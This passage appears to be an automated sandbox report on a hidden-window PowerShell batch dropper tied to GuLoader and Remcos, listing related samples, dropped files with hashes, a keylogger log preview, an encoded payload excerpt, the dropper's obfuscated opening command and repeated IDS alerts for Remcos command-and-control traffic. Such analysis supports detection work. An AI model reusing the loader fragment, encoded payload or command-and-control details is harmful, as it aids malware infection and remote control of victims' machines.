                                                  awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                  • 192.169.69.26
                                                  CLOUDFLARENETUSz1DHL_Shipping_.cmdGet hashmaliciousGuLoaderBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.206.204
                                                  NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                  • 104.26.1.231
                                                  NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                  • 104.26.1.231
                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                  • 188.114.96.3
                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                  • 104.29.220.112
                                                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                  • 104.29.0.194
                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                  • 172.71.167.138
                                                  https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.37.177
                                                  https://mcprod.britwyn.co.nzGet hashmaliciousUnknownBrowse
                                                  • 104.17.247.203

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ez1DHL_Shipping_.cmdGet hashmaliciousGuLoaderBrowse
                                                  • 104.21.56.189
                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                  • 104.21.56.189
                                                  https://doc.tayato.com/mo6/?top=uwe.geiersbach@bbraun.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.56.189
                                                  http://linternasdelmar.com/RDGHEVGet hashmaliciousUnknownBrowse
                                                  • 104.21.56.189
                                                  MDE_File_Sample_c30bdf9dd71e806fd1e0e834647bce524afa781f.zipGet hashmaliciousUnknownBrowse
                                                  • 104.21.56.189
                                                  (No subject) (90).emlGet hashmaliciousUnknownBrowse
                                                  • 104.21.56.189
                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 104.21.56.189
                                                  DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  DHL_Shipping_Invoices_Awb_BL_000000000102120242247820020031808174Global180030010212024.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 104.21.56.189
                                                  Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  37f463bf4616ecd445d4a1937da06e19Reminder.exeGet hashmaliciousAmadeyBrowse
                                                  • 104.21.56.189
                                                  P4.exeGet hashmaliciousXRedBrowse
                                                  • 104.21.56.189
                                                  Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 104.21.56.189
                                                  8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 104.21.56.189
                                                  proforma.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.56.189

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\ProgramData\remcos\logs.dat

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):204
                                                  Entropy (8bit):3.333539448221119
                                                  Encrypted:false
                                                  SSDEEP:3:rhlKlM+Xl0VlNWlTlCl55JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:6ljPlpCl55YcIeeDAlOWA41gWAv
                                                  MD5:7E573509D89630B182315A4844C865EC
                                                  SHA1:3B28B7BD08C07613FCD72EFB5576B5B16269A2EA
                                                  SHA-256:1CE31C8C9B208A3EBCB74B9872C7D037D82022C71A047D4326605A0C554E4F8E
                                                  SHA-512:0AEA766FF556741446BA0E982C3EF0D63768E16EE28A7053BA37EA68498F26DF5A2BA4CC59ED480FC1AA244A765A03FF363665AFDCB893BBCA33CBBCDAA8F3B3
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                  Reputation:low
                                                  Preview:....[.2.0.2.4./.1.0./.2.2. .0.1.:.0.2.:.3.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):8003
                                                  Entropy (8bit):4.840877972214509
                                                  Encrypted:false
                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                  MD5:106D01F562D751E62B702803895E93E0
                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllultnxj:NllU
                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                  Malicious:false
                                                  Preview:@...e................................................@..........

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dv2aynn.22h.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yvp1sen.yjk.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb5mf3nb.s1k.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vshfqw3p.ien.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.737874643991528
                                                  Encrypted:false
                                                  SSDEEP:48:Nyun/cmLPr3C4U28hjqukvhkvklCyw6md+UcwlRzSogZo9eUcwl4zSogZop1:oycm33CxHhXkvhkvCCt4Ucw6HnUcwZHa
                                                  MD5:F8052E61F491CBFBF5D93885C3C314AD
                                                  SHA1:16EE08EA8C0840BEC58D00F46AC097B45503A86A
                                                  SHA-256:E58B4B0430C29E306A402425BA7373F108129DFED2D6F068F81BDD11ED880E1A
                                                  SHA-512:20C26570AF776FD435B71975A9F6C1F7293B4EF46B2FC49D329BA115991C7326F319A0900CEBFBBCD9BE81787CED359BEAE812D7B06DC0E358C641DF0A87059A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....U&..?$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........?$..|t..?$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY;(...........................%..A.p.p.D.a.t.a...B.V.1.....VY9(..Roaming.@......CW.^VY9(...........................!#.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`.........................."...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY=(....Q...........

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VM7QWPDENMIN1NEHI4X8.temp

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.737874643991528
                                                  Encrypted:false
                                                  SSDEEP:48:Nyun/cmLPr3C4U28hjqukvhkvklCyw6md+UcwlRzSogZo9eUcwl4zSogZop1:oycm33CxHhXkvhkvCCt4Ucw6HnUcwZHa
                                                  MD5:F8052E61F491CBFBF5D93885C3C314AD
                                                  SHA1:16EE08EA8C0840BEC58D00F46AC097B45503A86A
                                                  SHA-256:E58B4B0430C29E306A402425BA7373F108129DFED2D6F068F81BDD11ED880E1A
                                                  SHA-512:20C26570AF776FD435B71975A9F6C1F7293B4EF46B2FC49D329BA115991C7326F319A0900CEBFBBCD9BE81787CED359BEAE812D7B06DC0E358C641DF0A87059A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....U&..?$..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........?$..|t..?$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY;(...........................%..A.p.p.D.a.t.a...B.V.1.....VY9(..Roaming.@......CW.^VY9(...........................!#.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`.........................."...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^VY=(....Q...........

                                                  C:\Users\user\AppData\Roaming\Overtidsbetalings.Del

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):498852
                                                  Entropy (8bit):5.867893141209894
                                                  Encrypted:false
                                                  SSDEEP:12288:2rfMN8qIKtSyBA30UnSh8HxlPEo6JHZQ2:oKpA3P0wxVl52
                                                  MD5:2BDDC5BA5CA1835B93004447E25041E5
                                                  SHA1:F494FC24F0056C569750F90F8325B6CC011919D2
                                                  SHA-256:E28A506C658753A74AEC3611452C57CB09C8C4DA75D285661AC1A6450A1D4AFD
                                                  SHA-512:13F77FAECBC1B255E04684AC3732F14F156281C17B961275523073A20F98BC029430CBC7ADB6AE9848F2823035EEAB31758E9790A018F46627FFB04FA0643515
                                                  Malicious:false
                                                  Preview:cQGb6wL2PLv9YRMAcQGbcQGbA1wkBHEBm+sCNbG5i5uzrHEBm+sCmEiB8foLRxhxAZvrAjnzgcGPbwtLcQGbcQGbcQGbcQGbupKe6SrrAlZ46wKkSOsC4a3rAiZ9McpxAZtxAZuJFAvrApdJcQGb0eJxAZvrAmDWg8EEcQGbcQGbgfnDEJ8EfMxxAZtxAZuLRCQEcQGb6wKqnInD6wK+EusCG4mBw6ykWwHrAnr26wK0arp+duCV6wLM4OsCS3iB8v00bilxAZtxAZuB6oNCjrxxAZvrAix/6wLArusCVFbrAhWl6wIRRosMEHEBm+sCEdyJDBNxAZtxAZtCcQGb6wKtq4H6zEEFAHXV6wLc6OsCqY6JXCQM6wL4uOsC4TKB7QADAADrAqVfcQGbi1QkCOsCNT9xAZuLfCQE6wIhjesCn8yJ63EBm3EBm4HDnAAAAOsCU3rrAr0TU+sCc7TrAgKmakBxAZvrAg3uietxAZvrAkxSx4MAAQAAAIC1BHEBm3EBm4HDAAEAAOsCv4brAki8U3EBm3EBm4nr6wLdqXEBm4m7BAEAAOsCNzhxAZuBwwQBAADrAjAk6wISjlNxAZtxAZtq/+sCEyDrAjBBg8IFcQGb6wI1ODH26wIWDHEBmzHJcQGb6wIakIsa6wKJm+sCGzFB6wIdhesCPwE5HAp18nEBm+sC5aRG6wJIL3EBm4B8Cvu4ddzrAhgJcQGbi0QK/OsC+ZXrAoufKfBxAZvrAql6/9LrAvye6wKCcrrMQQUA6wJkD+sCHDgxwHEBm3EBm4t8JAzrAvyM6wKL0YE0B/Z3eSvrAkjp6wK8SIPABHEBm3EBmznQdeTrAhgk6wIm3Yn7cQGbcQGb/9frAsifcQGbHnd5K/b2gMky72dwz7z510P+nKKr9sJoutKKqgXuujKP9ooY849nqgWe8G9iXqWgq/YsohPOxs0SAPjq8p+K0XO8+NpxkNO+cqf4wtpeC8wxM3QrIERiz86R

                                                  Static File Info

                                                  General

                                                  File type:ASCII text, with very long lines (5674), with no line terminators
                                                  Entropy (8bit):5.36210723011403
                                                  TrID:
                                                    File name:rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
                                                    File size:5'674 bytes
                                                    MD5:e6e618c4354c26c555872d5398a72086
                                                    SHA1:76cddb6019c5d76a96de461a85742d766feebca8
                                                    SHA256:e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3
                                                    SHA512:0251b7c4f32ad218628d5e71bd80f909e4c124420e47e434b622e280253189e615206d6f6846ac63d66af14500054f38b15f473f5725b541c6921c03e23fea87
                                                    SSDEEP:96:/ZAmDvLJYo/4xtgIYzTSWteyhFeeOFXsQOEPoxFft7K3/XG3gWTE:amDzafszOaNCXPOkYjKPQgWI
                                                    TLSH:CDC14A417B07927D0A49C11CFECF692BEE1C447A839C5F71E8C025DD11CE9289AED369
                                                    File Content Preview:start /min powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; func

                                                    File Icon

                                                    Icon Hash:9686878b929a9886

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-22T07:02:33.572403+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737104.21.56.189443TCP
                                                    2024-10-22T07:02:37.571910+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449738192.169.69.2651525TCP
                                                    2024-10-22T07:02:39.507074+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739192.169.69.2651525TCP
                                                    2024-10-22T07:02:41.285525+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740192.169.69.2651525TCP
                                                    2024-10-22T07:02:43.172847+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741192.169.69.2651525TCP
                                                    2024-10-22T07:02:45.089964+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742192.169.69.2651525TCP
                                                    2024-10-22T07:02:47.047752+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743192.169.69.2651525TCP
                                                    2024-10-22T07:02:49.036841+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744192.169.69.2651525TCP
                                                    2024-10-22T07:02:51.010939+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745192.169.69.2651525TCP
                                                    2024-10-22T07:02:52.969305+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746192.169.69.2651525TCP
                                                    2024-10-22T07:02:54.925553+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748192.169.69.2651525TCP
                                                    2024-10-22T07:02:56.872230+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449750192.169.69.2651525TCP
                                                    2024-10-22T07:02:58.709844+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449756192.169.69.2651525TCP
                                                    2024-10-22T07:03:00.653149+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449770192.169.69.2651525TCP
                                                    2024-10-22T07:03:02.569323+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449782192.169.69.2651525TCP
                                                    2024-10-22T07:03:04.440351+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449794192.169.69.2651525TCP
                                                    2024-10-22T07:03:06.187956+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449805192.169.69.2651525TCP
                                                    2024-10-22T07:03:08.175447+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449816192.169.69.2651525TCP
                                                    2024-10-22T07:03:09.992011+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449827192.169.69.2651525TCP
                                                    2024-10-22T07:03:11.856270+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449838192.169.69.2651525TCP
                                                    2024-10-22T07:03:13.818305+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449849192.169.69.2651525TCP
                                                    2024-10-22T07:03:15.579565+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449863192.169.69.2651525TCP
                                                    2024-10-22T07:03:17.452247+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449874192.169.69.2651525TCP
                                                    2024-10-22T07:03:19.302793+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449886192.169.69.2651525TCP
                                                    2024-10-22T07:03:21.297647+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449897192.169.69.2651525TCP
                                                    2024-10-22T07:03:23.275716+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449909192.169.69.2651525TCP
                                                    2024-10-22T07:03:25.250701+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449920192.169.69.2651525TCP
                                                    2024-10-22T07:03:27.115148+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449933192.169.69.2651525TCP
                                                    2024-10-22T07:03:28.913614+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449945192.169.69.2651525TCP
                                                    2024-10-22T07:03:30.697458+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449955192.169.69.2651525TCP
                                                    2024-10-22T07:03:32.667178+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449964192.169.69.2651525TCP
                                                    2024-10-22T07:03:34.538421+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449975192.169.69.2651525TCP
                                                    2024-10-22T07:03:36.331464+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449986192.169.69.2651525TCP
                                                    2024-10-22T07:03:38.310163+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449997192.169.69.2651525TCP
                                                    2024-10-22T07:03:40.217571+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450008192.169.69.2651525TCP
                                                    2024-10-22T07:03:42.067585+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450020192.169.69.2651525TCP
                                                    2024-10-22T07:03:43.802178+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450030192.169.69.2651525TCP
                                                    2024-10-22T07:03:45.625702+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450040192.169.69.2651525TCP
                                                    2024-10-22T07:03:47.261963+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450041192.169.69.2651525TCP
                                                    2024-10-22T07:03:49.006198+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450042192.169.69.2651525TCP
                                                    2024-10-22T07:03:50.658231+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450043192.169.69.2651525TCP
                                                    2024-10-22T07:03:52.391134+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450044192.169.69.2651525TCP
                                                    2024-10-22T07:03:54.007528+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450045192.169.69.2651525TCP
                                                    2024-10-22T07:03:55.611201+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450046192.169.69.2651525TCP
                                                    2024-10-22T07:03:57.205992+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450047192.169.69.2651525TCP
                                                    2024-10-22T07:03:58.783271+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450048192.169.69.2651525TCP
                                                    2024-10-22T07:04:00.296107+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450049192.169.69.2651525TCP
                                                    2024-10-22T07:04:01.930194+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450050192.169.69.2651525TCP
                                                    2024-10-22T07:04:03.335862+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450051192.169.69.2651525TCP
                                                    2024-10-22T07:04:04.793370+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450052192.169.69.2651525TCP
                                                    2024-10-22T07:04:06.280632+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450053192.169.69.2651525TCP
                                                    2024-10-22T07:04:07.737789+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450054192.169.69.2651525TCP
                                                    2024-10-22T07:04:09.037953+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450055192.169.69.2651525TCP
                                                    2024-10-22T07:04:10.317367+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450056192.169.69.2651525TCP
                                                    2024-10-22T07:04:11.708139+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450057192.169.69.2651525TCP
                                                    2024-10-22T07:04:13.173500+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450058192.169.69.2651525TCP
                                                    2024-10-22T07:04:14.675539+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059192.169.69.2651525TCP
                                                    2024-10-22T07:04:16.081463+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450060192.169.69.2651525TCP
                                                    2024-10-22T07:04:17.290370+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450061192.169.69.2651525TCP
                                                    2024-10-22T07:04:18.712284+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450062192.169.69.2651525TCP
                                                    2024-10-22T07:04:19.963537+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450063192.169.69.2651525TCP
                                                    2024-10-22T07:04:21.219845+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450064192.169.69.2651525TCP
                                                    2024-10-22T07:04:22.559881+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450065192.169.69.2651525TCP
                                                    2024-10-22T07:04:23.807201+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450066192.169.69.2651525TCP
